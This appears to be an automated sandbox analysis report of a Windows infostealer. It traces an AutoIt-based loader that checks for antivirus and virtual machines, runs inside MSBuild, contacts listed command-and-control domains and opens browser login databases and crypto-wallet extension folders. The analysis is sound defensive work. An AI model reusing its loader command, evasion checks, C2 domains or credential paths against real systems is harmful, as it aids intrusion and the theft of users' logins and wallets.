Source: is-E0D1D.tmp.3.dr Static PE information: section name: .didat
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B41046 push ecx; ret 35_2_00B41059
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A165 push 0140A191h; ret 35_2_0140A189
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A12D push 0140A159h; ret 35_2_0140A151
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013FA149 push 013FA175h; ret 35_2_013FA16D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013FA141 push 013FA175h; ret 35_2_013FA16D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A1A3 push 0140A1D1h; ret 35_2_0140A1C9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A1A5 push 0140A1D1h; ret 35_2_0140A1C9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01402089 push ecx; mov dword ptr [esp], ecx 35_2_0140208E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013FA0C9 push 013FA138h; ret 35_2_013FA130
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013FA0C7 push 013FA138h; ret 35_2_013FA130
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409344 push 01409388h; ret 35_2_01409380
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409345 push 01409388h; ret 35_2_01409380
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01400333 push 014003C9h; ret 35_2_014003C1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014043F3 push 01404421h; ret 35_2_01404419
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014043F5 push 01404421h; ret 35_2_01404419
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140039D push 014003C9h; ret 35_2_014003C1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014043B3 push 014043E1h; ret 35_2_014043D9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014043B5 push 014043E1h; ret 35_2_014043D9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01400211 push 01400287h; ret 35_2_0140027F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014092ED push 01409321h; ret 35_2_01409319
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014092F5 push 01409321h; ret 35_2_01409319
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01400289 push 01400331h; ret 35_2_01400329
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F3555 push 013F35A6h; ret 35_2_013F359E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01400400 push 0140044Eh; ret 35_2_01400446
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01400401 push 0140044Eh; ret 35_2_01400446
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F5479 push ecx; mov dword ptr [esp], eax 35_2_013F547A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A48B push 0140A4B9h; ret 35_2_0140A4B1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_0140A48D push 0140A4B9h; ret 35_2_0140A4B1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_014004B9 push 014004E5h; ret 35_2_014004DD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409774 push 014097B8h; ret 35_2_014097B0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409775 push 014097B8h; ret 35_2_014097B0
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-EUGF2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\hangbird\is-7LJOT.tmp
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvfvsdksvc_x64.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-5MQFH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\hangbird\Updater.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-E0D1D.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp File created: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BB2558 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 35_2_00BB2558
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B35D03 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 35_2_00B35D03
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe System information queried: FirmwareTableInformation
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\NVFTVRDLL64.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-EUGF2.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\nvfvsdksvc_x64.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-5MQFH.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\is-E0D1D.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QF9UH.tmp\ddETWExternal.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe API coverage: 5.3 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7628 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE Last function: Thread delayed
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E180 GetFileAttributesW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_00B8E180
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A187 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_00B9A187
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A2E4 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 35_2_00B9A2E4
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9A66E FindFirstFileW,Sleep,FindNextFileW,FindClose, 35_2_00B9A66E
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9686D FindFirstFileW,FindNextFileW,FindClose, 35_2_00B9686D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8E9BA GetFileAttributesW,FindFirstFileW,FindClose, 35_2_00B8E9BA
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B974F0 FindFirstFileW,FindClose, 35_2_00B974F0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B97591 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 35_2_00B97591
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8DE32 GetFileAttributesW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,DeleteFileW,CompareStringW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 35_2_00B8DE32
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F50B5 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 35_2_013F50B5
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F51BD FindFirstFileA,GetLastError, 35_2_013F51BD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_013F29E5 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 35_2_013F29E5
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_00B3310D
Source: Updater.exe, 00000023.00000002.2227868489.0000000001417000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmware
Source: Updater.exe, Updater.exe, 00000023.00000003.2221324344.0000000001478000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227714652.0000000001389000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000003.2221324344.0000000001427000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227868489.000000000143B000.00000004.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Updater.exe, 00000023.00000002.2227868489.0000000001417000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft hyper-v video
Source: MSBuild.exe, 00000024.00000002.2348303261.000000000124D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.tmp, 00000001.00000002.1684347888.0000000000D61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x
Source: file.tmp, 00000001.00000002.1684347888.0000000000D61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01403EA7 LdrInitializeThunk, 35_2_01403EA7
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B9F607 BlockInput, 35_2_00B9F607
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B32D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 35_2_00B32D33
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_00B3310D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B44BF4 mov eax, dword ptr fs:[00000030h] 35_2_00B44BF4
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01415AFE mov eax, dword ptr fs:[00000030h] 35_2_01415AFE
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B8A mov eax, dword ptr fs:[00000030h] 35_2_01409B8A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B8A mov eax, dword ptr fs:[00000030h] 35_2_01409B8A
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B91 mov eax, dword ptr fs:[00000030h] 35_2_01409B91
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01409B91 mov eax, dword ptr fs:[00000030h] 35_2_01409B91
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_01403CA5 mov eax, dword ptr fs:[00000030h] 35_2_01403CA5
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B820BE GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation, 35_2_00B820BE
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B52446 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00B52446
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B40E4D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 35_2_00B40E4D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B40F9F SetUnhandledExceptionFilter, 35_2_00B40F9F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B411EE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 35_2_00B411EE
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Memory protected: page readonly | page read and write | page guard | page no cache

HIPS / PFW / Operating System Protection Evasion

Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: servicedny.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: authorisev.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: faulteyotk.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: dilemmadu.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: contemteny.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: goalyfeastz.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: opposezmny.site
Source: Updater.exe, 00000023.00000003.2226839187.0000000004020000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: seallysl.site
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8230F LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 35_2_00B8230F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B32D33 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 35_2_00B32D33
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B8C078 SendInput,keybd_event, 35_2_00B8C078
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00BA2E89 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 35_2_00BA2E89
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe updater.exe C:\ProgramData\\bYrIyAT.a3x
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B81C68 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 35_2_00B81C68
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B82777 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 35_2_00B82777
Source: Updater.exe, 0000001C.00000000.1715428534.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmp, is-7LJOT.tmp.3.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Updater.exe Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B40CA4 cpuid 35_2_00B40CA4
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 35_2_013F2BBD
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: GetLocaleInfoA,GetACP, 35_2_013F90D9
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: GetLocaleInfoA, 35_2_013F34E1
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: GetLocaleInfoA, 35_2_013F7B41
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: GetLocaleInfoA, 35_2_013F7B8D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 35_2_013F2CC7
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B98C58 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 35_2_00B98C58
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B659C7 GetUserNameW, 35_2_00B659C7
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B5B99F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 35_2_00B5B99F
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Code function: 35_2_00B3310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 35_2_00B3310D
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: find.exe, 00000013.00000002.1709477597.0000021154610000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000013.00000002.1709402244.000002115444B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: avgui.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
